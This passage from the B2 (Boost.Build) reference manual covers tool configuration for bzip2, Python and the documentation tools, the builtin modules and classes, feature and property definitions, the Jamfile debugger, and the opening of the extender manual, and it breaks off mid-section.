The directory containing the bzip2 headers.
If none of these options is specified, then the environment variables BZIP2_LIBRARY_PATH, BZIP2_NAME, and BZIP2_INCLUDE will be used instead.
Options for building bzip2 from source:
source
The directory containing the bzip2 source.
Examples:
# Find bzip in the default system location
using bzip2 ;
# Build bzip from source
using bzip2 : 1.0.6 : <source>/home/sergey/src/bzip2-1.0.6 ;
# Find bzip in /usr/local
using bzip2 : 1.0.6 : <include>/usr/local/include <search>/usr/local/lib ;
# Build bzip from source for msvc and find
# prebuilt binaries for gcc.
using bzip2 : 1.0.6 : <source>C:/Devel/src/bzip2-1.0.6 : <toolset>msvc ;
using bzip2 : 1.0.6 : : <toolset>gcc ;
Python
python can be initialized using the following syntax:
using python : [version] : [command-or-prefix] : [includes] : [libraries] : [conditions] : [extension-suffix] ;
Options for using python:
version
The version of Python to use. Should be in Major.Minor format, for example 2.3. Do not include the sub-minor version.
command-or-prefix
Preferably, a command that invokes a Python interpreter. Alternatively, the installation prefix for Python libraries and includes. If empty, will be guessed from the version, the platform’s installation patterns, and the python executables that can be found in PATH.
includes
The include path to Python headers. If empty, will be guessed.
libraries
The path to Python library binaries. If empty, will be guessed. On MacOS/Darwin, you can also pass the path of the Python framework.
conditions
If specified, should be a set of properties that are matched against the build configuration when B2 selects a Python configuration to use.
extension-suffix
A string to append to the name of extension modules before the true filename extension.
Ordinarily we would just compute this based on the value of the <python-debugging> feature. However, Ubuntu’s python-dbg package uses the Windows convention of appending _d to debug-build extension modules. We have no way of detecting Ubuntu, or of probing python for the "_d" requirement, and if you configure and build python using --with-pydebug, you’ll be using the standard *nix convention. Defaults to "" (or "_d" when targeting Windows and <python-debugging> is set).
Examples:
# Find python in the default system location
using python ;
# 2.7
using python : 2.7 ;
# 3.5
using python : 3.5 ;
# On ubuntu 16.04
using python
  : 2.7                         # version
  :                             # interpreter/path to dir
  : /usr/include/python2.7      # includes
  : /usr/lib/x86_64-linux-gnu   # libs
  :                             # conditions
  ;
using python
  : 3.5                         # version
  :                             # interpreter/path to dir
  : /usr/include/python3.5      # includes
  : /usr/lib/x86_64-linux-gnu   # libs
  :                             # conditions
  ;
# On windows
using python
  : 2.7                                # version
  : C:\\Python27-32\\python.exe        # interpreter/path to dir
  : C:\\Python27-32\\include           # includes
  : C:\\Python27-32\\libs              # libs
  : <address-model>32 <address-model>  # conditions - both 32 and unspecified
  ;
using python
  : 2.7                         # version
  : C:\\Python27-64\\python.exe # interpreter/path to dir
  : C:\\Python27-64\\include    # includes
  : C:\\Python27-64\\libs       # libs
  : <address-model>64           # conditions
  ;
6.4.3. Documentation tools
B2 support for the Boost documentation tools is documented below.
xsltproc
To use xsltproc, you first need to configure it using the following syntax:
using xsltproc : xsltproc ;
Where xsltproc is the xsltproc executable. If xsltproc is not specified, and the variable XSLTPROC is set, the value of XSLTPROC will be used. Otherwise, xsltproc will be searched for in PATH.
The following options can be provided, using <option-name>option-value syntax:
xsl:param
Values should have the form name=value.
xsl:path
Sets an additional search path for xi:include elements.
catalog
A catalog file used to rewrite remote URLs to a local copy.
The xsltproc module provides the following rules. Note that these operate on jam targets and are intended to be used by another toolset, such as boostbook, rather than directly by users.
xslt
rule xslt ( target : source stylesheet : properties * )
Runs xsltproc to create a single output file.
xslt-dir
rule xslt-dir ( target : source stylesheet : properties * : dirname )
Runs xsltproc to create multiple outputs in a directory. dirname is unused, but exists for historical reasons. The output directory is determined from the target.
boostbook
To use boostbook, you first need to configure it using the following syntax:
using boostbook : docbook-xsl-dir : docbook-dtd-dir : boostbook-dir ;
docbook-xsl-dir is the DocBook XSL stylesheet directory. If not provided, we use DOCBOOK_XSL_DIR from the environment (if available) or look in standard locations. Otherwise, we let the XML processor load the stylesheets remotely.
docbook-dtd-dir is the DocBook DTD directory. If not provided, we use DOCBOOK_DTD_DIR from the environment (if available) or look in standard locations. Otherwise, we let the XML processor load the DTD remotely.
boostbook-dir is the BoostBook directory with the DTD and XSL sub-dirs.
The boostbook module depends on xsltproc. For pdf or ps output, it also depends on fop.
The following options can be provided, using <option-name>option-value syntax:
format
Allowed values: html, xhtml, htmlhelp, onehtml, man, ps, docbook, fo, tests.
The format feature determines the type of output produced by the boostbook rule.
The boostbook module defines a rule for creating a target following the common syntax.
boostbook
rule boostbook ( target-name : sources * : requirements * : default-build * )
Creates a boostbook target.
doxygen
To use doxygen, you first need to configure it using the following syntax:
using doxygen : name ;
name is the doxygen command. If it is not specified, it will be found in the PATH.
The doxygen module depends on the boostbook module when generating BoostBook XML.
The following options can be provided, using <option-name>option-value syntax:
doxygen:param
All the values of doxygen:param are added to the doxyfile.
prefix
Specifies the common prefix of all headers when generating BoostBook XML. Everything before this will be stripped off.
reftitle
Specifies the title of the library-reference section, when generating BoostBook XML.
doxygen:xml-imagedir
When generating BoostBook XML, specifies the directory in which to place the images generated from LaTeX formulae.
The doxygen module defines a rule for creating a target following the common syntax.
doxygen
rule doxygen ( target : sources * : requirements * : default-build * : usage-requirements * )
Creates a doxygen target. If the target name ends with .html, then this will generate an html directory. Otherwise it will generate BoostBook XML.
quickbook
The quickbook module provides a generator to convert from Quickbook to BoostBook XML.
To use quickbook, you first need to configure it using the following syntax:
using quickbook : command ;
command is the quickbook executable. If it is not specified, B2 will compile it from source. If it is unable to find the source, it will search for a quickbook executable in PATH.
fop
The fop module provides generators to convert from XSL formatting objects to Postscript and PDF.
To use fop, you first need to configure it using the following syntax:
using fop : fop-command : java-home : java ;
fop-command is the command to run fop. If it is not specified, B2 will search for it in PATH and FOP_HOME. Either java-home or java can be used to specify where to find java.
6.5. Builtin modules
This section describes the modules that are provided by B2. The import rule allows rules from one module to be used in another module or Jamfile.
6.5.1. modules
The modules module defines basic functionality for handling modules.
A module defines a number of rules that can be used in other modules.
Modules can contain code at the top level to initialize the module. This code is executed the first time the module is loaded.
rule import ( module-names + : rules-opt * : rename-opt * )
Imports the specified modules. The imported rules will be available without qualification in the caller’s module. Any members of rename-opt will be taken as the names of the rules in the caller’s module, in place of the names they have in the imported module. If rules-opt = '*', all rules from the indicated module are imported into the caller’s module. If rename-opt is supplied, it must have the same number of elements as rules-opt.
6.5.2. path
Performs various path manipulations. Paths are always in a 'normalized' representation. In it, a path may be either:
['/'] [ ( '..' '/' )* (token '/')* token ]
In plain English, a path can be rooted, '..' elements are allowed only at the beginning, and it never ends in a slash, except for the path consisting of a slash only.
rule make ( native )
Converts the native path into normalized form.
rule native ( path )
Builds the native representation of the path.
rule is-rooted ( path )
Tests if a path is rooted.
rule has-parent ( path )
Tests if a path has a parent.
rule basename ( path )
Returns the path without any directory components.
rule parent ( path )
Returns the parent directory of the path. If no parent exists, an error is issued.
rule reverse ( path )
Returns path2 such that [ join path path2 ] = ".". The path may not contain ".." elements or be rooted.
rule join ( elements + )
Concatenates the passed path elements. Generates an error if any element other than the first one is rooted. Skips any empty or undefined path elements.
rule root ( path root )
If path is relative, it is rooted at root. Otherwise, it is unchanged.
rule exists ( file )
Returns true if the specified file exists.
rule all-parents ( path : upper_limit ? : cwd ? )
Finds the absolute name of path and returns the list of all the parents, starting with the immediate one. Parents are returned as relative names. If upper_limit is specified, directories above it will be pruned.
rule glob-in-parents ( dir : patterns + : upper-limit ? )
Globs for patterns in the parent directories of dir, up to and including upper-limit, if it is specified, or till the filesystem root otherwise.
rule relative ( child parent : no-error ?
) Assuming child is a subdirectory of parent, returns the relative path from parent to child.
rule relative-to ( path1 path2 )
Returns the minimal path to path2 that is relative to path1.
rule programs-path ( )
Returns the list of paths which are used by the operating system for looking up programs.
rule makedirs ( path )
Creates a directory and all parent directories that do not already exist.
6.5.3. regex
Contains rules for string processing using regular expressions. In patterns, "\<" matches the beginning of a word and "\>" matches the end of a word.
rule split ( string separator )
Returns a list of the following substrings: from the beginning till the first occurrence of separator or till the end; between each occurrence of separator and the next occurrence; from the last occurrence of separator till the end. If no separator is present, the result will contain only one element.
rule split-list ( list * : separator )
Returns the concatenated results of applying regex.split to every element of the list using the separator pattern.
rule match ( pattern : string : indices * )
Matches string against pattern, and returns the elements indicated by indices.
rule transform ( list * : pattern : indices * )
Matches all elements of list against the pattern and returns a list of the elements indicated by indices of all successful matches. If indices is omitted, returns a list of the first parenthesized groups of all successful matches.
rule escape ( string : symbols : escape-symbol )
Escapes all of the characters in symbols using the escape symbol escape-symbol.
6.5.4. sequence
Contains rules for manipulating sequences.
rule filter ( predicate + : sequence * )
Returns all elements e of $(sequence) for which [ $(predicate) e ] has a non-null value.
rule transform ( function + : sequence * )
Returns a new sequence consisting of [ $(function) $(e) ] for each element e of $(sequence).
rule reverse ( s * )
Returns the elements of s in reverse order.
rule insertion-sort ( s * : ordered * )
Insertion-sorts s using the BinaryPredicate ordered.
rule merge ( s1 * : s2 * : ordered * )
Merges two ordered sequences using the BinaryPredicate ordered.
rule join ( s * : joint ? )
Joins the elements of s into one long string. If joint is supplied, it is used as a separator.
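An illustrative jam fragment using the sequence rules described here. The predicate rule positive is invented for the example:

import sequence ;
import numbers ;

# Predicate: non-null result for elements greater than zero.
rule positive ( n )
{
    if [ numbers.less 0 $(n) ] { return true ; }
}

local l = [ sequence.filter positive : -1 2 -3 4 ] ;
ECHO [ sequence.join $(l) : ", " ] ;  # echoes the filtered list, joined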
rule length ( s * )
Returns the length of any sequence.
rule unique ( list * : stable ? )
Removes duplicates from list. If stable is passed, then the order of the elements will be unchanged.
rule max-element ( elements + : ordered ? )
Returns the maximum number in elements. Uses ordered for comparisons, or numbers.less if none is provided.
rule select-highest-ranked ( elements * : ranks * )
Returns all of elements for which the corresponding element in the parallel list ranks is equal to the maximum value in ranks.
6.5.5. stage
This module defines the install rule, used to copy a set of targets to a single location.
rule add-install-dir ( name : suffix ? : parent ? : options * )
Defines a named installation directory. For example, add-install-dir foo : bar : baz ; creates the feature <install-foo> and adds support for the named directory (foo) to the install rule. The rule will try to use the value of the <install-foo> property if present, otherwise it will fall back to (baz)/bar.
Arguments:
name: the name of the directory.
suffix: the path suffix appended to the parent named directory.
parent: the optional name of the parent named directory.
options: special options that modify treatment of the directory. Allowed options:
package-suffix: append the package name to the default value. For example:
add-install-dir foo : bar : baz : package-suffix ;
install (foo) : a : <install-package>xyz ;
installs a into (baz)/bar/xyz.
rule install-dir-names ( )
Returns the names of all registered installation directories.
rule get-dir ( name : property-set : package-name : flags * )
Returns the path to a named installation directory. For a given name=xyz the rule uses the value of the <install-xyz> property if it is present in property-set. Otherwise it tries to construct the default value of the path recursively, getting the path to name's registered base named directory and the relative path.
For example:

stage.add-install-dir foo : bar : baz ;
local ps = [ property-set.create <install-foo>x/y/z ] ;
echo [ stage.get-dir foo : $(ps) : $(__name__) ] ; # outputs x/y/z
ps = [ property-set.create <install-baz>a/b/c/d ] ;
echo [ stage.get-dir foo : $(ps) : $(__name__) ] ; # outputs a/b/c/d/bar

The argument package-name is used to construct the path for named directories that were registered with the package-suffix option, and also to construct install-prefix when targeting Windows.
Available flags:
- staged: take staging-prefix into account.
- relative: return the path to name relative to its base directory.

rule get-package-name ( property-set : project-module ? )
Returns the package name that will be used for install targets when constructing the installation location. The rule uses the value of the <install-package> property if it is present in property-set. Otherwise it deduces the package name using project-module's attributes. It traverses the project hierarchy up to the root searching for the first project with an id. If none is found, the base name of the root project's location is used. If project-module is empty, the caller module is used (this allows invoking just [ get-package-name $(ps) ] in project jam files).

6.5.6. type

rule register-suffixes ( suffixes + : type )
Specifies that files with the given suffixes be recognized as targets of type type. Issues an error if a different type is already specified for any of the suffixes.

rule registered ( type )
Returns true iff type has been registered.

rule validate ( type )
Issues an error if type is unknown.

rule set-scanner ( type : scanner )
Sets a scanner class that will be used for this type.

rule get-scanner ( type : property-set )
Returns a scanner instance appropriate to type and property-set.

rule base ( type )
Returns a base type for the given type, or nothing in case the given type is not derived.

rule all-bases ( type )
Returns the given type and all of its base types in order of their distance from type.

rule all-derived ( type )
Returns the given type and all of its derived types in order of their distance from type.
rule is-derived ( type base )
Returns true if type is equal to base or has base as its direct or indirect base.

rule set-generated-target-suffix ( type : properties * : suffix )
Sets a file suffix to be used when generating a target of type with the specified properties. Can be called with no properties if no suffix has already been specified for the type. The suffix parameter can be an empty string ("") to indicate that no suffix should be used. Note that this does not cause files with suffix to be automatically recognized as being of type type with the given properties.

rule set-generated-target-prefix ( type : properties * : prefix )
Sets a target prefix that should be used when generating targets of type with the specified properties. Can be called with empty properties if no prefix for type has been specified yet. The prefix parameter can be an empty string ("") to indicate that no prefix should be used.

rule type ( filename )
Returns the file type given its name. If there are several dots in the filename, tries each suffix. E.g. for the name "file.so.1.2" the suffixes "2", "1", and "so" will be tried.

6.6. Builtin classes

6.6.1. Class abstract-target

Base class for all abstract targets.

class abstract-target {
    rule __init__ ( name : project )
    rule name ( )
    rule project ( )
    rule location ( )
    rule full-name ( )
    rule generate ( property-set )
}

Classes derived from abstract-target: project-target, main-target, basic-target.

rule __init__ ( name : project )

rule name ( )
Returns the name of this target.

rule project ( )
Returns the project for this target.

rule location ( )
Returns the location where the target was declared.

rule full-name ( )
Returns a user-readable name for this target.

rule generate ( property-set )
Generates virtual targets for this abstract target using the specified properties, unless a different value of some feature is required by the target. This is an abstract method which must be overridden by derived classes. On success, returns:
- a property-set with the usage requirements to be applied to dependents
- a list of produced virtual targets, which may be empty.
If property-set is empty, performs the default build of this target, in a way specific to the derived class.

6.6.2. Class project-target

class project-target : abstract-target {
    rule generate ( property-set )
    rule build-dir ( )
    rule main-target ( name )
    rule has-main-target ( name )
    rule find ( id : no-error ? )
    # Methods inherited from abstract-target
    rule name ( )
    rule project ( )
    rule location ( )
    rule full-name ( )
}

This class has the following responsibilities:
- Maintaining a list of main targets in this project and building them.

rule generate ( property-set )
Overrides abstract-target.generate. Generates virtual targets for all the targets contained in this project. On success, returns:
- a property-set with the usage requirements to be applied to dependents
- a list of produced virtual targets, which may be empty.

rule build-dir ( )
Returns the root build directory of the project.

rule main-target ( name )
Returns a main-target class instance corresponding to name. Can only be called after the project has been fully loaded.

rule has-main-target ( name )
Returns whether a main-target with the specified name exists. Can only be called after the project has been fully loaded.

rule find ( id : no-error ? )
Find and return the target with the specified id, treated relative to self. The id may specify either a target or a file name, with the target taking priority. May report an error or return nothing if the target is not found, depending on the no-error parameter.

6.6.3. Class main-target

class main-target : abstract-target {
    rule generate ( property-set )
    # Methods inherited from abstract-target
    rule name ( )
    rule project ( )
    rule location ( )
    rule full-name ( )
}

A main-target represents a named top-level target in a Jamfile.

rule generate ( property-set )
Overrides abstract-target.generate. Selects an alternative for this main target by finding all alternatives whose requirements are satisfied by property-set and picking the one with the longest requirements set.
Returns the result of calling generate on that alternative. On success, returns:
- a property-set with the usage requirements to be applied to dependents
- a list of produced virtual targets, which may be empty.

6.6.4. Class basic-target

class basic-target : abstract-target {
    rule __init__ ( name : project : sources * : requirements * : default-build * : usage-requirements * )
    rule generate ( property-set )
    rule construct ( name : source-targets * : property-set )
    # Methods inherited from abstract-target
    rule name ( )
    rule project ( )
    rule location ( )
    rule full-name ( )
}

Implements the most standard way of constructing a main target alternative from sources. Allows sources to be either files or other main targets, and handles generation of those dependency targets.

rule __init__ ( name : project : sources * : requirements * : default-build * : usage-requirements * )

rule generate ( property-set )
Overrides abstract-target.generate. Determines final build properties, generates sources, and calls construct. This method should not be overridden. On success, returns:
- a property-set with the usage requirements to be applied to dependents
- a list of produced virtual targets, which may be empty.

rule construct ( name : source-targets * : property-set )
Constructs virtual targets for this abstract target. Returns a usage-requirements property-set and a list of virtual targets. Should be overridden in derived classes.

6.6.5. Class typed-target

class typed-target : basic-target {
    rule __init__ ( name : project : type : sources * : requirements * : default-build * : usage-requirements * )
    rule type ( )
    rule construct ( name : source-targets * : property-set )
    # Methods inherited from abstract-target
    rule name ( )
    rule project ( )
    rule location ( )
    rule full-name ( )
    # Methods inherited from basic-target
    rule generate ( property-set )
}

typed-target is the most common kind of target alternative. Rules for creating typed targets are defined automatically for each type.
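As a brief sketch of how typed targets come into existence: registering a type automatically makes a down-cased main target rule of the same name available (the VERBATIM type here is the illustrative example used in the Extender Manual section of this document):

```jam
import type ;

# Registering a type automatically defines a main target rule whose
# name is the down-cased type name (see "Main target rules").
type.register VERBATIM : verbatim ;

# A Jamfile can now declare a typed-target of type VERBATIM:
# verbatim code : code.verbatim ;
```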
rule __init__ ( name : project : type : sources * : requirements * : default-build * : usage-requirements * )

rule type ( )

rule construct ( name : source-targets * : property-set )
Implements basic-target.construct. Attempts to create a target of the correct type using generators appropriate for the given property-set. Returns a property-set containing the usage requirements and a list of virtual targets.

6.6.6. Class property-set

Class for storing a set of properties.

class property-set {
    rule raw ( )
    rule str ( )
    rule propagated ( )
    rule add ( ps )
    rule add-raw ( properties * )
    rule refine ( ps )
    rule get ( feature )
}

There is a one-to-one correspondence between identity and value: no two instances of the class are equal. To maintain this property, the property-set.create rule should be used to create new instances. Instances are immutable.

rule raw ( )
Returns a Jam list of the stored properties.

rule str ( )
Returns the string representation of the stored properties.

rule propagated ( )
Returns a property-set containing all the propagated properties in this property-set.

rule add ( ps )
Returns a new property-set containing the union of the properties in this property-set and in ps.

rule add-raw ( properties * )
Like add, except that it takes a list of properties instead of a property-set.

rule refine ( ps )
Refines properties by overriding any non-free and non-conditional properties for which a different value is specified in ps. Returns the resulting property-set.

rule get ( feature )
Returns all the values of feature.

6.7. Build process

The general overview of the build process was given in the user documentation. This section provides additional details, and some specific rules.
To recap, building a target with specific properties includes the following steps:
- applying the default build,
- selecting the main target alternative to use,
- determining the "common" properties,
- building targets referred to by the sources list and dependency properties,
- adding the usage requirements produced when building dependencies to the "common" properties,
- building the target using generators,
- computing the usage requirements to be returned.

6.7.1. Alternative selection

When a target has several alternatives, one of them must be selected. The process is as follows:
1. For each alternative, its condition is defined as the set of base properties in its requirements. Conditional properties are excluded.
2. An alternative is viable only if all properties in its condition are present in the build request.
3. If there is only one viable alternative, it is chosen. Otherwise, an attempt is made to find the best alternative. An alternative a is better than another alternative b if the set of properties in b's condition is a strict subset of the set of properties of a's condition. If one viable alternative is better than all the others, it is selected. Otherwise, an error is reported.

6.7.2. Determining common properties

"Common" properties is a somewhat artificial term. This is the intermediate property set from which both the build request for dependencies and the properties for building the target are derived. Since the default build and alternatives are already handled, we have only two inputs: the build request and the requirements. Here are the rules about common properties:
- Non-free features can have only one value.
- A non-conditional property in the requirements is always present in common properties.
- A property in the build request is present in common properties, unless it is overridden by a property in the requirements.
- If either the build request or the requirements (non-conditional or conditional) include an expandable property (either composite, or with a specified sub-feature value), the behavior is equivalent to explicitly adding all the expanded properties to the build request or the requirements, respectively.
- If the requirements include a conditional property, and the condition of this property is true in the context of common properties, then the conditional property should be in common properties as well.
- If no value for a feature is given by the other rules here, it has its default value in common properties.

These rules are declarative. They do not specify how to compute the common properties. However, they provide enough information for the user. The important point is the handling of conditional requirements. The condition can be satisfied either by a property in the build request, by non-conditional requirements, or even by another conditional property. For example, the following works as expected:

exe a : a.cpp : <toolset>gcc:<variant>release <variant>release:<define>FOO ;

6.7.3. Target Paths

Several factors determine the location of a concrete file target. All files in a project are built under the directory bin unless this is overridden by the build-dir project attribute. Under bin, B2 creates a subdirectory path derived from the target's non-incidental properties, so that targets built with different build specifications are placed in different directories (see Feature Attributes below).

6.8. Definitions

6.8.1. Features and properties

A feature is a normalized (toolset-independent) aspect of a build configuration, such as whether inlining is enabled. Feature names may not contain the '>' character. Each feature in a build configuration has one or more associated values. Feature values for non-free features may not contain the pointy-bracket ('<'), colon (':'), equal-sign ('='), and dash ('-') characters. Feature values for free features may not contain the pointy-bracket ('<') character.

A property is a (feature, value) pair, expressed as <feature>value.
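To make these definitions concrete, here is a small illustrative Jamfile fragment (the target and file names are invented for this sketch):

```jam
# <optimization>speed and <define>NDEBUG are properties; together they
# form a property set. <optimization> is an ordinary feature with a
# fixed value set; <define> is a free feature, so several <define>
# properties may appear in one build specification.
exe app : app.cpp : <optimization>speed <define>NDEBUG ;
```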
A subfeature is a feature that only exists in the presence of its parent feature, and whose identity can be derived (in the context of its parent) from its value. A subfeature's parent can never be another subfeature. Thus, features and their subfeatures form a two-level hierarchy.

A value-string for a feature F is a string of the form value-subvalue1-subvalue2…-subvalueN, where value is a legal value for F and subvalue1…subvalueN are legal values of some of F's subfeatures, separated with dashes ('-'). For example, the properties <toolset>gcc <toolset-version>3.0.1 can be expressed more concisely using a value-string, as <toolset>gcc-3.0.1.

A property set is a set of properties (i.e. a collection without duplicates), for instance: <toolset>gcc <runtime-link>static.

A property path is a property set whose elements have been joined into a single string separated by slashes. A property path representation of the previous example would be <toolset>gcc/<runtime-link>static.

A build specification is a property set that fully describes the set of features used to build a target.

6.8.2. Property Validity

For free features, all values are valid. For all other features, the valid values are explicitly specified, and the build system will report an error for the use of an invalid feature-value. Subproperty validity may be restricted so that certain values are valid only in the presence of certain other subproperties. For example, it is possible to specify that the <gcc-target>mingw property is only valid in the presence of <gcc-version>2.95.2.

6.8.3. Feature Attributes

Each feature has a collection of zero or more of the following attributes. Feature attributes are low-level descriptions of how the build system should interpret a feature's values when they appear in a build request. We also refer to the attributes of properties, so that an incidental property, for example, is one whose feature has the incidental attribute.
Incidental features are assumed not to affect build products at all. As a consequence, the build system may use the same file for targets whose build specifications differ only in incidental features. A feature that controls a compiler's warning level is one example of a likely incidental feature. Non-incidental features are assumed to affect build products, so the files for targets whose build specifications differ in non-incidental features are placed in different directories as described in Target Paths.

Propagated features are propagated to dependencies. That is, if a main target is built using a propagated property, the build system attempts to use the same property when building any of its dependencies as part of that main target. For instance, when an optimized executable is requested, one usually wants it to be linked with optimized libraries. Thus, the <optimization> feature is propagated.

Most features have a finite set of allowed values, and can only take on a single value from that set in a given build specification. Free features, on the other hand, can have several values at a time and each value can be an arbitrary string. For example, it is possible to have several preprocessor symbols defined simultaneously: <define>NDEBUG=1 <define>HAS_CONFIG_H=1

Normally a feature only generates a sub-variant directory when its value differs from its default value, leading to an asymmetric sub-variant directory structure for certain values of the feature. A symmetric feature always generates a corresponding sub-variant directory.

The value of a path feature specifies a path. The path is treated as relative to the directory of the Jamfile where the path feature is used, and is translated appropriately by the build system when the build is invoked from a different directory.

Values of implicit features alone identify the feature. For example, a user is not required to write "<toolset>gcc", but can simply write "gcc".
Implicit feature names also do not appear in variant paths, although the values do. Thus: bin/gcc/… as opposed to bin/toolset-gcc/…. There should typically be only a few such features, to avoid possible name clashes.

Composite features actually correspond to groups of properties. For example, a build variant is a composite feature. When generating targets from a set of build properties, composite features are recursively expanded and added to the build property set, so rules can find them if necessary. Non-composite non-free features override components of composite features in a build property set.

The value of a dependency feature is a target reference. When used for building a main target, the value of a dependency feature is treated as an additional dependency. For example, dependency features allow one to state that library A depends on library B. As a result, whenever an application links to A, it will also link to B. Specifying B as a dependency of A is different from adding B to the sources of A.

Features that are neither free nor incidental are called base features.

6.8.4. Feature Declaration

The low-level feature declaration interface is the feature rule from the feature module:

rule feature ( name : allowed-values * : attributes * )

A feature's allowed-values may be extended with the feature.extend rule.

6.8.5. Property refinement

When a target with certain properties is requested, and that target requires some set of properties, the build system needs to find the set of properties to use for building. This process is called property refinement and is performed by these rules:
- Each property in the required set is added to the original property set.
- If the original property set includes a property with a different value of a non-free feature, that property is removed.

6.8.6. Conditional properties

Sometimes it is desirable to apply certain requirements only for a specific combination of other properties.
For example, one of the compilers that you use issues a pointless warning that you want to suppress by passing a command-line option to it. You would not want to pass that option to other compilers. Conditional properties allow you to do just that. Their syntax is:

property ( "," property ) * ":" property

For example, the problem above would be solved by:

exe hello : hello.cpp : <toolset>yfc:<cxxflags>-disable-pointless-warning ;

The syntax also allows several properties in the condition, for example:

exe hello : hello.cpp : <os>NT,<toolset>gcc:<link>static ;

6.8.7. Target identifiers and references

A target identifier is used to denote a target. The syntax is:

target-id -> (target-name | file-name | project-id | directory-name) | (project-id | directory-name) "//" target-name
project-id -> path
target-name -> path
file-name -> path
directory-name -> path

This grammar allows some elements to be recognized as either:
- the name of a target declared in the current Jamfile (note that target names may include slashes),
- a regular file, denoted by an absolute name or a name relative to the project's sources location,
- a project id (at this point, all project ids start with a slash),
- the directory of another project, denoted by an absolute name or a name relative to the current project's location.

To determine the real meaning, the possible interpretations are checked in this order. For example, a valid target id might be a plain target name, a file name, or a project-id//target-name pair.

Rationale: the target is separated from the project by a special separator (not just a slash) because:
- It emphasizes that projects and targets are different things.
- It allows main target names to contain slashes.

A target reference is used to specify a source target, and may additionally specify desired properties for that target.
It has this syntax:

target-reference -> target-id [ "/" requested-properties ]
requested-properties -> property-path

For example,

exe compiler : compiler.cpp libs/cmdline/<optimization>space ;

would cause the version of the cmdline library optimized for space to be linked in, even if the compiler executable is built with optimization for speed.

7. Utilities

7.1. Debugger

7.1.1. Overview

B2 comes with a debugger for Jamfiles. To run the debugger, start B2 with b2 -dconsole.

$ b2 -dconsole
(b2db) break gcc.init
Breakpoint 1 set at gcc.init
(b2db) run
Starting program: /usr/bin/b2
Breakpoint 1, gcc.init ( ) at /usr/share/boost-build/tools/gcc.jam:74
74 local tool-command = ;
(b2db) quit

7.1.2. Running the Program

The run command is used to start a new b2 subprocess for debugging. The arguments to run are passed on the command line. If a child process is already running, it will be terminated before the new child is launched. When the program is paused, continue will resume execution. The step command will advance the program by a single statement, stopping on entry to another function or on return from the current function. next is like step except that it skips over function calls. finish executes until the current function returns. The kill command terminates the current child immediately.

7.1.3. Breakpoints

Breakpoints are set using the break command. The location of the breakpoint can be specified as either the name of a function (including the module name) or a file name and line number of the form file:line. When a breakpoint is created it is given a unique id which is used to identify it for other commands.

(b2db) break Jamfile:10
Breakpoint 1 set at Jamfile:10
(b2db) break msvc.init
Breakpoint 2 set at msvc.init

A breakpoint can be temporarily disabled using the disable command. While a breakpoint is disabled, the child will not stop when it is hit. A disabled breakpoint can be activated again with enable.
(b2db) disable 1
(b2db) enable 1

Breakpoints can be removed permanently with delete or clear. The difference between them is that delete takes the breakpoint id while clear takes the location of the breakpoint as originally specified to break.

(b2db) clear Jamfile:10
Deleted breakpoint 1
(b2db) delete 2

7.1.4. Examining the Stack

The backtrace command will print a summary of every frame on the stack. The print command can be used to show the value of an expression.

(b2db) print [ modules.peek : ARGV ]
/usr/bin/b2 toolset=msvc install
(b2db) print $(__file__)
Jamfile.jam

8. Extender Manual

8.1. Introduction

This section explains how to extend B2 to accommodate your local requirements — primarily to add support for non-standard tools you have. Before we start, be sure you have read and understood the concept of metatarget, Concepts, which is critical to understanding the remaining material.

The current version of B2 has three levels of targets, listed below.

- metatarget: object that is created from declarations in Jamfiles. May be called with a set of properties to produce concrete targets.
- concrete target: object that corresponds to a file or an action.
- jam target: low-level target specific to the B2 engine; essentially a string, most often the name of a file.

8.1.1. Metatargets

A metatarget records the information specified in a Jamfile and can be called, via its generate method, with specific properties to produce concrete targets.[4] The generate method takes the build properties (as an instance of the property-set class) and returns a list containing:

- as the front element — usage requirements from this invocation (an instance of property-set),
- as subsequent elements — created concrete targets (instances of the virtual-target class).

It is possible to look up a metatarget by its target id.

8.1.2. Concrete targets

To create a concrete target, you specify a name, a type and a project. We also pass the action object created earlier. If the action creates several targets, we can repeat the second line several times.

In some cases, code that creates concrete targets may be invoked more than once with the same properties. Returning two different instances of file-target that correspond to the same file clearly will result in problems.
Therefore, whenever returning targets, you should pass them via the virtual-target.register function. Besides allowing B2 to track which virtual targets got created for each metatarget, this will also replace targets with previously created identical ones, as necessary.[5] Here are a couple of examples:

return [ virtual-target.register $(t) ] ;
return [ sequence.transform virtual-target.register : $(targets) ] ;

8.1.3. Generators

In theory, every kind of metatarget in B2 could be implemented with its own metatarget class, but in practice that would be too inflexible. Instead, B2 defines the concepts of target type and generator.

8.2. Example: 1-to-1 generator

Say you're writing an application that generates C++ code. If you ever did this, you know that it's not nice. Embedding large portions of C++ code in string literals is very awkward. A much better solution is:

1. Write the template of the code to be generated, leaving placeholders at the points that will change.
2. Access the template in your application and replace placeholders with appropriate text.
3. Write the result.

This is something B2 can automate. First, you teach B2 about your template file type: when B2 sees code.verbatim in a list of sources, it knows that it's of type VERBATIM. Next, you tell B2 how targets of type VERBATIM are converted, by declaring a generator for that type.

8.3. Target types

The first thing we did in the introduction was declaring a new target type:

import type ;
type.register VERBATIM : verbatim ;

The type is the most important property of a target. B2 can automatically generate necessary build actions only because you specify the desired type (using the different main target rules), and because B2 can guess the type of sources from their extensions. A type derived from an existing one may also come with a special generator for the new type. For example, it can generate additional meta-information for the plugin. Either way, the PLUGIN type can be used wherever SHARED_LIB can. For example, you can directly link plugins to an application.

8.4. Scanners

Sometimes, a file can refer to other files via some include system. To make B2 track such dependencies between files, you need to provide a scanner.

8.5. Tools and generators

This section will describe how B2 can be extended to support new tools. For each additional tool, a B2 object called a generator must be created.
That object has specific types of targets that it accepts and produces. Using that information, B2 is able to automatically invoke the generator. For example, if you declare a generator that takes a target of the type D and produces a target of the type OBJ, placing a file with extension .d in a list of sources will cause B2 to invoke your generator and, eventually, to link the resulting object file into the application. The standard base generator classes handle much of the complexity for you: one handles dependency scanning for C files, and another handles various complexities like searched libraries. For that reason, you should always use those classes when adding support for compilers and linkers. (Need a note about UNIX.)

Custom generator classes can have their behavior overridden where needed.

8.6. Features

Often, you need to control the options passed to the invoked tools. This is done with features. B2 also lets you pass raw, unportable options straight through to the command line (see "Can I get capture external program output using a Boost.Jam variable?" for an example of very smart usage of that feature). Of course one should always strive to use portable features, but these are still provided as a backdoor just to make sure B2 does not take away any control from the user.

Using portable features is a good idea because:
- When a portable feature is given a fixed set of values, you can build your project with two different settings of the feature and B2 will automatically use two different directories for generated files. B2 does not try to separate targets built with different raw options.
- Unlike with "raw" features, you don't need to use specific command-line flags in your Jamfile, and it will be more likely to work with other tools.

Steps for adding a feature

Adding a feature requires three steps:

